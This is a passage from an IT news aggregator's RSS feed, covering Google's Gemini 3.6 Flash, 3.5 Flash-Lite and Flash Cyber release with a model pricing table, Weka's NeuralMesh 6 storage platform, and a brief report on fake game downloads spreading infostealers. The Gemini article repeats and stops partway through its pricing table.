<content:encoded><![CDATA[<p>Enterprise Document Intelligence [Vol.1 #8bis] - Two regimes for sending retrieved candidates to the generation brick, the sufficiency signal that picks between them, and the per-question type dispatch that makes it cheap</p>
<p>The post <a href="https://towardsdatascience.com/loop-engineering-for-rag-generation-when-top-1-is-enough-when-you-need-top-k/">Loop Engineering for RAG Generation: iterate top-k one at a time</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google's Gemini 3.6 Flash model cuts AI agent token costs by up to 65% on long horizon engineering tasks —and 3.5 Pro is on the way]]></title>
<description><![CDATA[Google DeepMind today released three new proprietary AI models it says are among its most token-efficient yet: Gemini 3.6 Flash, Gemini 3.5 Flash-Lite, and Gemini 3.5 Flash Cyber. The models aim to make AI agents faster, smarter, and cheaper at scale. Google is pricing Gemini 3.6 Flash at $1.50 p...]]></description>
<link>https://tsecurity.de/de/3684881/it-nachrichten/googles-gemini-36-flash-model-cuts-ai-agent-token-costs-by-up-to-65-on-long-horizon-engineering-tasks-and-35-pro-is-on-the-way/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684881/it-nachrichten/googles-gemini-36-flash-model-cuts-ai-agent-token-costs-by-up-to-65-on-long-horizon-engineering-tasks-and-35-pro-is-on-the-way/</guid>
<pubDate>Tue, 21 Jul 2026 23:33:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google DeepMind<a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber/?utm_source=x&amp;utm_medium=social&amp;utm_campaign=&amp;utm_content="> today released three new proprietary AI models</a> it says are among its most token-efficient yet: Gemini 3.6 Flash, Gemini 3.5 Flash-Lite, and Gemini 3.5 Flash Cyber. </p><p>The models aim to make AI agents faster, smarter, and cheaper at scale. Google is pricing Gemini 3.6 Flash at $1.50 per one million input tokens and $7.50 per one million output tokens through its application programming interface (API), while Gemini 3.5 Flash-Lite costs a staggeringly cheap $0.30/$2.50 per million tokens in/out. </p><p>Compare that to the $1.50/$9.00 per 1M tokens for Gemini 3.5 Flash, and the $2/$12 for Gemini 3.1 Pro Preview, and the savings are considerable. However, Google's prior generation Gemini 3.1 Flash-Lite still remains the search giant's "most cost-efficient" model at $0.25/$1.50 per 1M tokens. Yet, it remains 2X slower than the new, more expensive Gemini 3.5 Flash-Lite, giving those enterprises who value speed more "bang" for their buck. </p><h2><b>VB Frontier AI Model API Pricing Comparison Chart (Late July 2026 Shortlist)</b></h2><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Input ($/1M)</b></p></td><td><p><b>Output ($/1M)</b></p></td><td><p><b>Total ($/1M)</b></p></td><td><p><b>Source</b></p></td></tr><tr><td><p>MiMo-V2.5 Flash</p></td><td><p>$0.10</p></td><td><p>$0.30</p></td><td><p>$0.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>deepseek-v4-flash</p></td><td><p>$0.14</p></td><td><p>$0.28</p></td><td><p>$0.42</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>deepseek-v4-pro</p></td><td><p>$0.435</p></td><td><p>$0.87</p></td><td><p>$1.305</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>MiniMax-M3</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://platform.minimax.io/subscribe/token-plan?tab=api-enterprise">MiniMax</a></p></td></tr><tr><td><p>LongCat-2.0 — limited-time promo</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">LongCat</a></p></td></tr><tr><td><p>Gemini 3.1 Flash-Lite</p></td><td><p>$0.25</p></td><td><p>$1.50</p></td><td><p>$1.75</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Qwen3.7-Plus</p></td><td><p>$0.40</p></td><td><p>$1.60</p></td><td><p>$2.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-plus&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>MiMo-V2.5</p></td><td><p>$0.40</p></td><td><p>$2.00</p></td><td><p>$2.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p><b>Gemini 3.5 Flash-Lite</b></p></td><td><p><b>$0.30</b></p></td><td><p><b>$2.50</b></p></td><td><p><b>$2.80</b></p></td><td><p><b></b><a href="https://ai.google.dev/gemini-api/docs/pricing"><b>Google</b></a><b></b></p></td></tr><tr><td><p>LongCat-2.0 — standard</p></td><td><p>$0.75</p></td><td><p>$2.95</p></td><td><p>$3.70</p></td><td><p><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">LongCat</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (≤256K)</p></td><td><p>$1.00</p></td><td><p>$3.00</p></td><td><p>$4.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>GLM-5.2</p></td><td><p>$1.40</p></td><td><p>$4.40</p></td><td><p>$5.80</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>GPT-5.6 Luna</p></td><td><p>$1.00</p></td><td><p>$6.00</p></td><td><p>$7.00</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>Grok 4.5</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://docs.x.ai/developers/models">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (&gt;256K)</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p><b>Gemini 3.6 Flash</b></p></td><td><p><b>$1.50</b></p></td><td><p><b>$7.50</b></p></td><td><p><b>$9.00</b></p></td><td><p><b></b><a href="https://ai.google.dev/gemini-api/docs/pricing"><b>Google</b></a></p></td></tr><tr><td><p>Qwen3.7-Max</p></td><td><p>$2.50</p></td><td><p>$7.50</p></td><td><p>$10.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-max&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>Gemini 3.5 Flash</p></td><td><p>$1.50</p></td><td><p>$9.00</p></td><td><p>$10.50</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (≤200K)</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>GPT-5.6 Terra</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.4</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Kimi K3</p></td><td><p>$3.00</p></td><td><p>$15.00</p></td><td><p>$18.00</p></td><td><p><a href="https://platform.kimi.ai/docs/pricing/chat-k3">Moonshot AI</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (&gt;200K)</p></td><td><p>$4.00</p></td><td><p>$18.00</p></td><td><p>$22.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Claude Opus 4.8</p></td><td><p>$5.00</p></td><td><p>$25.00</p></td><td><p>$30.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/pricing">Anthropic</a></p></td></tr><tr><td><p>GPT-5.5</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.5 Instant (chat-latest)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://developers.openai.com/api/docs/models/chat-latest">OpenAI</a></p></td></tr><tr><td><p>Sakana Fugu Ultra (≤272K)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://console.sakana.ai/pricing#subscription-plan">Sakana AI</a></p></td></tr><tr><td><p>GPT-5.6 Sol</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>Claude Fable 5 / Claude Mythos 5</p></td><td><p>$10.00</p></td><td><p>$50.00</p></td><td><p>$60.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/models/overview">Anthropic</a></p></td></tr></tbody></table><p>No price was provided yet for the specialty Gemini 3.5 Flash Cyber model, which, as its name would imply, is designed for cybersecurity researchers and red teamers to patch bugs. </p><p>While the prices are among the middle-low end of all major AI models globally, the fact that Google designed them to use less tokens overall also should drive down costs for enterprises beyond what the sticker price shows (since you'll be paying for fewer total tokens at any rate). </p><p>Gemini 3.6 Flash and Gemini 3.5 Flash-Lite are available immediately through the Gemini API in Google AI Studio and Android Studio, as well as within the consumer Gemini application and Google Search. According to a <a href="https://deepmind.google/blog/introducing-gemini-3-5-flash-cyber/">separate Google blog post</a>, Gemini 3.5 Flash Cyber will be available "exclusively available to governments and trusted partners via CodeMender soon" — <a href="https://deepmind.google/blog/introducing-codemender-an-ai-agent-for-code-security/">CodeMender</a> being Google's proprietary AI code bug-fixing agent released last year. </p><p>As with previous Gemini models, these are all proprietary and "closed source," thus, they can only be obtained through Google's official API and that of its partners, as opposed to an open-source license like MIT or Apache 2.0. </p><p>One conspicuous omission noted by developers on X and social media: where is the larger, more powerful, flagship Gemini 3.5 Pro model Google previously alluded would be released this summer? After all, Gemini 3.1 Pro, the prior flagship, <a href="https://venturebeat.com/technology/google-launches-gemini-3-1-pro-retaking-ai-crown-with-2x-reasoning">debuted back in February 2026</a>, and rivals OpenAI and Anthropic have since released several more generations of flagship updates far more powerful than Google's. </p><p>Google technical staffer Logan Kilpatrick <a href="https://x.com/OfficialLoganK/status/2079592006163349538">responded to one such inquiry on X, writing</a>: "Gemini 3.5 Pro is currently testing with partners and we plan to make it broadly available as soon as it’s ready." </p><p>Google's release signals that the immediate future of AI lies in agentic capabilities—systems that operate autonomously over extended periods. </p><p>If early large language models are akin to massive, fuel-hungry freight trains capable of hauling incredible loads at immense cost, the new Flash series represents a fleet of nimble, hyper-efficient hybrid delivery vans.</p><h2><b>Efficiency gains ranging from 17% to 65% reduced tokens for strong results on third-party benchmarks</b></h2><p>Under the hood, Gemini 3.6 Flash achieves significant efficiency gains. The model reduces output token usage by 17% compared to its predecessor, Gemini 3.5 Flash, according to the <a href="https://x.com/ArtificialAnlys/status/2079596244339707956">Artificial Analysis Index</a> maintained by the independent third-party AI benchmarking group of the same name. </p><p>In specific long-horizon software engineering benchmarks like <a href="https://deepswe.datacurve.ai/">DeepSWE</a>, which measures how well agents complete multi-step engineering tasks from scratch, the token savings reach up to 65%. </p><p>This reduction means the model requires fewer reasoning steps and tool calls to complete the exact same multi-step workflow. Think of token efficiency like fuel economy in a vehicle. </p><p>When an AI model takes a convoluted path to solve a problem, it burns through more computational fuel, driving up the final cost for the developer. By streamlining its internal logic, Gemini 3.6 Flash arrives at the correct answer faster and cheaper.</p><p>While Google's materials did not specify the exact architectural or algorithmic changes used to achieve this token efficiency, they noted that the model "takes fewer reasoning steps and tool calls to accomplish multi-step workflows" and exhibits reduced "verbosity."</p><p>The official model cards released by Google reveal that both <a href="https://storage.googleapis.com/deepmind-media/Model-Cards/Gemini-3-6-Flash-Model-Card.pdf">Gemini 3.6 Flash</a> and <a href="https://storage.googleapis.com/deepmind-media/Model-Cards/Gemini-3-5-Flash-Lite-Model-Card.pdf">Gemini 3.5 Flash-Lite</a> feature a 1-million-token input context window alongside a max output limit of 64,000 tokens, with both models sharing a knowledge cutoff date of March 2026.</p><h2><b>Respectable benchmark performance at low cost</b></h2><p>The technological improvements extend to concrete capabilities. Gemini 3.6 Flash scores 49% on the DeepSWE benchmark, a notable increase from the 37% achieved by version 3.5. </p><p>It also pushes machine learning engineering performance higher, scoring 63.9% on MLE-Bench compared to 49.7% previously. Furthermore, Google integrates computer use as a built-in client-side tool via the Gemini API and Gemini Enterprise, reflecting an OSWorld-Verified score of 83.0%, up from 78.4%. </p><p>The model also tackles knowledge work with greater proficiency, outperforming its predecessor on benchmarks like GDPval-AA v2 by moving from a score of 1349 to 1421.</p><p>To ensure safety amidst these capability upgrades, Google deploys enhanced Frontier Safety safeguards. These protections harden the model against jailbreaks and mitigate risks in Chemical, Biological, Radiological, and Nuclear domains, as well as cyber offense misuses. </p><p>The engineering team trains the model to minimize refusals for beneficial uses, striking a necessary balance between strict security and practical utility.</p><h2>M<b>odels for low-cost coding, agentic, and cybersecurity use cases — respectively</b></h2><p>Google divided its new offerings into three distinct products tailored for different operational needs. </p><p>Gemini 3.6 Flash serves as the heavy-duty workhorse of the trio. It handles complex coding, intricate knowledge work, and multimodal processing with improved precision. Enterprise customers utilize it for demanding tasks such as complex document parsing, intricate chart and data analysis, and long-form report drafting. </p><p>The model executes complex code migrations using multi-agent orchestration frameworks with lower latency and higher quality than earlier iterations. Furthermore, 3.6 Flash aids in developing photographic texture extractors for 3D workflows using canvas interfaces.</p><p>Gemini 3.5 Flash-Lite targets environments where high throughput and absolute minimal latency are non-negotiable. Google designates it as the fastest model in the 3.5 series. </p><p>As measured by Artificial Analysis, the model processes 350 output tokens per second, making it highly effective for agentic search and massive document processing workloads. <a href="https://artificialanalysis.ai/articles/gemini-3-6-flash-3-5-flash-lite-halving-time">Artificial Analysis notes</a> this is about twice as fast as prior generation model Gemini 3.1 Flash-Lite.</p><p>Developers can configure 3.5 Flash-Lite to prioritize low-latency execution for high-volume tasks using minimal thinking levels, or engage higher thinking levels to process complex multi-step subagent workloads. </p><p>Despite its lite designation, it outperforms the standard Gemini 3 Flash on several key agentic and coding evaluations, including SWE-Bench Pro, where it scores 54.2% compared to 49.6%, and OSWorld-Verified, scoring 74.0% versus 65.1%. </p><p>The model extracts product features from massive datasets, generates interactive web design concepts, and scales receipt translation seamlessly.</p><p>The third product, Gemini 3.5 Flash Cyber, represents a highly specialized deployment. Google fine-tuned this model specifically to find and fix cybersecurity vulnerabilities. It integrates directly with Google's CodeMender agent. </p><p>In practice, multiple 3.5 Flash Cyber agents work concurrently to produce a single, comprehensive vulnerability report, achieving competitive performance at the frontier on the CyberGym benchmark, even getting within range of Anthropic's much-hyped Mythos model.</p><p>Google did not specify an exact numerical cost for 3.5 Flash Cyber, stating only that it is fine-tuned "at a lower price per token than larger models.</p><h2><b>Commercial licensing only</b></h2><p>The licensing framework for the new Gemini models carries profound implications for developers and enterprise users. Google deploys Gemini 3.6 Flash and 3.5 Flash-Lite under a commercial, proprietary API model. Unlike open-source software governed by licenses such as the MIT License or the GNU General Public License, developers do not gain access to the underlying model weights, training data, or source code.</p><p>An MIT or GPL license grants users the freedom to download the codebase, modify the internal architecture, self-host the deployment, and distribute the software infrastructure independently. In contrast, Google's API approach means developers essentially rent access to the intelligence on a strict metered basis. Every prompt and generated response travels through Google's managed servers, incurring a cost based on the strict pricing structure of $1.50 per million input tokens for 3.6 Flash. </p><p>This commercial tethering restricts deployment flexibility. Enterprises cannot air-gap the models entirely on their own local secure hardware without establishing specialized, high-tier enterprise agreements with Google Cloud. Developers remain bound by Google's acceptable use policies, arbitrary rate limits, and network requirements, creating a permanent dependency on Google's infrastructure uptime and terms of service.</p><p>The licensing for Gemini 3.5 Flash Cyber proves even more restrictive. Acknowledging the dual-use nature of cybersecurity AI—which attackers can weaponize just as easily as defenders can use it to patch systems—Google is for now making the model only available behind a limited-access pilot program, similar to the trend kicked off by Anthropic's Mythos model with its <a href="https://venturebeat.com/technology/anthropic-says-its-most-powerful-ai-cyber-model-is-too-dangerous-to-release">Project Glasswing program</a>, and continued by <a href="https://venturebeat.com/technology/openai-unveils-gpt-5-6-sol-terra-and-luna-models-but-only-accessible-to-limited-preview-partners-for-now-per-us-gov">OpenAI with its staggered rollout for GPT-5.6</a>. </p><p>In this case, Google is making 3.5 Flash Cyber exclusively available to governments and trusted partners. This strict gatekeeping prevents open access, prioritizing systemic security over widespread developer innovation.</p><h2><b>Looking ahead</b></h2><p>Google DeepMind continues to iterate rapidly, but the gap in its product line remains apparent. While the Flash series excels in speed and economy, the industry eagerly awaits the deployment of Gemini 3.5 Pro to gauge Google's absolute frontier capabilities.</p><p>Simultaneously, the company confirms that pre-training for Gemini 4 has already commenced. </p><p>Until the next major flagship release materializes, developers must optimize their systems using the highly efficient, yet purposefully constrained, Flash architecture.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop adding more GPUs: Weka's new storage platform reduces load by caching 100% of an AI model's pre-calculated tokens]]></title>
<description><![CDATA[GPU memory is the most expensive resource in production AI, and it's also the one running out fastest. Long context windows and multi-turn conversations force AI models to repeatedly recompute information they've already processed, consuming GPU memory and compute that could otherwise serve addit...]]></description>
<link>https://tsecurity.de/de/3684878/it-nachrichten/stop-adding-more-gpus-wekas-new-storage-platform-reduces-load-by-caching-100-of-an-ai-models-pre-calculated-tokens/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684878/it-nachrichten/stop-adding-more-gpus-wekas-new-storage-platform-reduces-load-by-caching-100-of-an-ai-models-pre-calculated-tokens/</guid>
<pubDate>Tue, 21 Jul 2026 23:33:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>GPU memory is the most expensive resource in production AI, and it's also the one running out fastest. </p><p>Long context windows and multi-turn conversations force AI models to repeatedly recompute information they've already processed, consuming GPU memory and compute that could otherwise serve additional users or generate new responses.</p><p>Instead of treating GPU memory as the limiting resource,  why not extend it with much cheaper storage technologies? </p><p><a href="https://www.weka.io/">Weka</a>, for one, believes that cheap flash storage can close that gap. The company's NeuralMesh 6 software platform, launching alongside its first self-designed hardware line, Wekapod 3, extends what Weka calls Augmented Memory Grid, an approach that aggregates NAND flash to behave like GPU memory at a fraction of the cost.</p><p>This is an active and increasingly crowded category. Dell, NetApp, Pure Storage and VAST have all repositioned toward AI infrastructure over the past two years and Weka is one of several vendors arguing it's built for this specific moment rather than adapting to it.</p><p>"What we're seeing now with customers is they're chasing availability of compute, and once they get new allocation from anyone, they want to be able to grab it and start running right away," Weka co-founder and CEO Liran Zvibel, told VentureBeat.</p><p>The potential payoff is straightforward: better utilization of existing GPU investments, lower inference costs and faster deployment of new AI workloads without waiting months for additional GPU capacity.</p><p>The technology is most relevant for organizations already operating AI at scale or expecting rapid growth in usage, particularly enterprises building internal copilots, customer service agents, software engineering assistants or retrieval systems with long context windows. Smaller deployments may see less immediate benefit than organizations where GPU utilization has already become a limiting factor.</p><h2><b>Inside Weka's NeuralMesh 6</b></h2><p>NeuralMesh 6 adds four capabilities aimed directly at a functionality gap Zvibel says has been costing Weka deals in competitive evaluations.</p><p><b>Composable and virtual multi-tenancy.</b> Composable clusters give anchor tenants full hardware-level isolation, dedicated CPU, memory, and storage. Virtual multi-tenancy runs through Weka's RDMA fabric, delivering network-level isolation that scales past 1,000 tenants per cluster, with provisioning in under 30 minutes. Combined, a single cluster running 50 composable clusters can support up to 50,000 tenants. </p><p><b>Unified file and object storage.</b> Most storage systems keep two separate paths: a file-based path (the standard way servers and applications read and write files, used heavily in training and fine-tuning pipelines) and an object-based path (S3, the format inference and cloud-native tools typically expect). Normally a gateway translates between the two, meaning the data effectively exists twice. Weka's claim is that the same physical data on disk is directly readable through either path at once, no translation layer, no second copy. Zvibel is targeting non-AWS GPU clouds specifically, naming Lambda, Nebius, G42, and CoreWeave, with what he described as roughly two orders of magnitude higher performance than conventional S3 and a capacity-based pricing model instead of per-API charges. </p><p><b>Metadata-first replication.</b> Destination environments become browsable before a full data copy arrives, with data hydrating only when accessed. </p><p>"They had to wait for all of that to make it to the other side, and this takes days or weeks, in extreme cases a month," Zvibel said. "We now allow our customers to grab some allocation of new GPUs and get up and running within an hour."</p><p><b>AlloyFlash and Always-On data reduction</b>. TLC and QLC are two types of NAND flash memory. TLC is faster and more durable but costs more per terabyte, while QLC is cheaper and holds more data per chip but is slower. AlloyFlash mixes both within a single cluster, automatically routing latency-sensitive work to TLC while running bulk-capacity workloads on QLC, cutting cost per terabyte without a performance penalty on the work that needs speed. Data reduction now runs by default rather than as an option.</p><h2><b>Solving AI's context problem</b></h2><p>Multi-tenancy and object storage solve how enterprises and neo clouds operate the platform day to day. A harder problem sits underneath: as context windows and multi-turn interactions grow, so does the GPU compute wasted recalculating work a model has already done. Augmented Memory Grid, a NeuralMesh 6 feature built specifically for this, is Weka's answer.</p><p>Every prompt triggers two stages. Prefill calculates attention, the core mechanism behind how large language models process input, and it's computationally expensive. Decode converts that calculation into output and is comparatively lightweight. </p><p>The cost shows up hardest in multi-turn sessions like chat or coding, where each new turn re-triggers prefill for everything that came before it, unless that work has been cached.</p><p>"If you have 10 turns, you may overcalculate 100 times because you're redoing all of them. If you have 20, you'll overcalculate 400 times," Zvibel said. "You can put two orders of magnitude more NAND than you could afford in shared memory, and we can cache 100% of the pre-calculated tokens, so you never need to redo it."</p><h2><b>Where Weka sits competitively</b></h2><p>Storage vendors have spent the past year and a half repositioning around AI, and separating genuine capability from repositioned messaging is now a real evaluation problem for buyers. </p><p>"The storage world is shifting its focus from serving bits to enterprise workloads to managing data at the speed of AI. We've seen that most clearly over the past 18 months from Dell, NetApp, and Pure," Steve McDowell, chief analyst at NAND Research, told VentureBeat. "The interesting thing is that companies like Weka, and VAST, are the true AI-native data companies, solving these problems since day one."</p><p>McDowell singled out Augmented Memory Grid as Weka's clearest technical lead. </p><p>"Weka continues to have the most technically capable KV cache implementation on the market with its Augmented Memory Grid," he said. " They were early with this technology, and continue to innovate. This is critical for AI inference, as it enables a level of GPU efficiency that, without question, saves money on GPUs and memory. That’s key for today’s memory and GPU constrained market." </p><p>He also flagged Weka's contractual guarantee on its data reduction claims as underappreciated. </p><p>"One flying a little under the radar: Weka is putting its money where its mouth is with its contractual guarantees for its data reduction promises," he said.</p><p>McDowell's advice to buyers evaluating competing claims from Weka, VAST, Pure and NetApp alike was pointed suggesting that enterprise buyers should look hard at what vendors are promising versus what they're actually delivering.</p><p>"A smart buyer will look at how competing vendors are solving real-world problems today," McDowell said. " They do this by talking to organizations running similar workloads at similar scale. If a vendor can't point to that, then it should be a warning sign."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Turn Fake Games Into Multi-Stage Infostealers That Steal Passwords and Crypto Wallets]]></title>
<description><![CDATA[Criminals are using fake game downloads to slip a sophisticated information stealer onto Windows computers. The campaign hides behind supposed games, mods, cracks, and other software, exploiting the trust and urgency around free or hard-to-find downloads. A downloaded archive can…
Read more →
The...]]></description>
<link>https://tsecurity.de/de/3684857/it-security-nachrichten/hackers-turn-fake-games-into-multi-stage-infostealers-that-steal-passwords-and-crypto-wallets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684857/it-security-nachrichten/hackers-turn-fake-games-into-multi-stage-infostealers-that-steal-passwords-and-crypto-wallets/</guid>
<pubDate>Tue, 21 Jul 2026 23:05:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Criminals are using fake game downloads to slip a sophisticated information stealer onto Windows computers. The campaign hides behind supposed games, mods, cracks, and other software, exploiting the trust and urgency around free or hard-to-find downloads. A downloaded archive can…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-turn-fake-games-into-multi-stage-infostealers-that-steal-passwords-and-crypto-wallets/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-turn-fake-games-into-multi-stage-infostealers-that-steal-passwords-and-crypto-wallets/">Hackers Turn Fake Games Into Multi-Stage Infostealers That Steal Passwords and Crypto Wallets</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google's Gemini Flash 5.6 model cuts AI agent token costs by up to 65% on long horizon engineering tasks —and 3.5 Pro is on the way]]></title>
<description><![CDATA[Google DeepMind today released three new proprietary AI models it says are among its most token-efficient yet: Gemini 3.6 Flash, Gemini 3.5 Flash-Lite, and Gemini 3.5 Flash Cyber. The models aim to make AI agents faster, smarter, and cheaper at scale. Google is pricing Gemini 3.6 Flash at $1.50 p...]]></description>
<link>https://tsecurity.de/de/3684788/it-nachrichten/googles-gemini-flash-56-model-cuts-ai-agent-token-costs-by-up-to-65-on-long-horizon-engineering-tasks-and-35-pro-is-on-the-way/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684788/it-nachrichten/googles-gemini-flash-56-model-cuts-ai-agent-token-costs-by-up-to-65-on-long-horizon-engineering-tasks-and-35-pro-is-on-the-way/</guid>
<pubDate>Tue, 21 Jul 2026 22:56:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google DeepMind<a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber/?utm_source=x&amp;utm_medium=social&amp;utm_campaign=&amp;utm_content="> today released three new proprietary AI models</a> it says are among its most token-efficient yet: Gemini 3.6 Flash, Gemini 3.5 Flash-Lite, and Gemini 3.5 Flash Cyber. </p><p>The models aim to make AI agents faster, smarter, and cheaper at scale. Google is pricing Gemini 3.6 Flash at $1.50 per one million input tokens and $7.50 per one million output tokens through its application programming interface (API), while Gemini 3.5 Flash-Lite costs a staggeringly cheap $0.30/$2.50 per million tokens in/out. </p><p>Compare that to the $1.50/$9.00 per 1M tokens for Gemini 3.5 Flash, and the $2/$12 for Gemini 3.1 Pro Preview, and the savings are considerable. However, Google's prior generation Gemini 3.1 Flash-Lite still remains the search giant's "most cost-efficient" model at $0.25/$1.50 per 1M tokens. Yet, it remains 2X slower than the new, more expensive Gemini 3.5 Flash-Lite, giving those enterprises who value speed more "bang" for their buck. </p><h2><b>VB Frontier AI Model API Pricing Comparison Chart (Late July 2026 Shortlist)</b></h2><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Input ($/1M)</b></p></td><td><p><b>Output ($/1M)</b></p></td><td><p><b>Total ($/1M)</b></p></td><td><p><b>Source</b></p></td></tr><tr><td><p>MiMo-V2.5 Flash</p></td><td><p>$0.10</p></td><td><p>$0.30</p></td><td><p>$0.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>deepseek-v4-flash</p></td><td><p>$0.14</p></td><td><p>$0.28</p></td><td><p>$0.42</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>deepseek-v4-pro</p></td><td><p>$0.435</p></td><td><p>$0.87</p></td><td><p>$1.305</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>MiniMax-M3</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://platform.minimax.io/subscribe/token-plan?tab=api-enterprise">MiniMax</a></p></td></tr><tr><td><p>LongCat-2.0 — limited-time promo</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">LongCat</a></p></td></tr><tr><td><p>Gemini 3.1 Flash-Lite</p></td><td><p>$0.25</p></td><td><p>$1.50</p></td><td><p>$1.75</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Qwen3.7-Plus</p></td><td><p>$0.40</p></td><td><p>$1.60</p></td><td><p>$2.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-plus&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>MiMo-V2.5</p></td><td><p>$0.40</p></td><td><p>$2.00</p></td><td><p>$2.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p><b>Gemini 3.5 Flash-Lite</b></p></td><td><p><b>$0.30</b></p></td><td><p><b>$2.50</b></p></td><td><p><b>$2.80</b></p></td><td><p><b></b><a href="https://ai.google.dev/gemini-api/docs/pricing"><b>Google</b></a><b></b></p></td></tr><tr><td><p>LongCat-2.0 — standard</p></td><td><p>$0.75</p></td><td><p>$2.95</p></td><td><p>$3.70</p></td><td><p><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">LongCat</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (≤256K)</p></td><td><p>$1.00</p></td><td><p>$3.00</p></td><td><p>$4.00</p></td><td><p><a 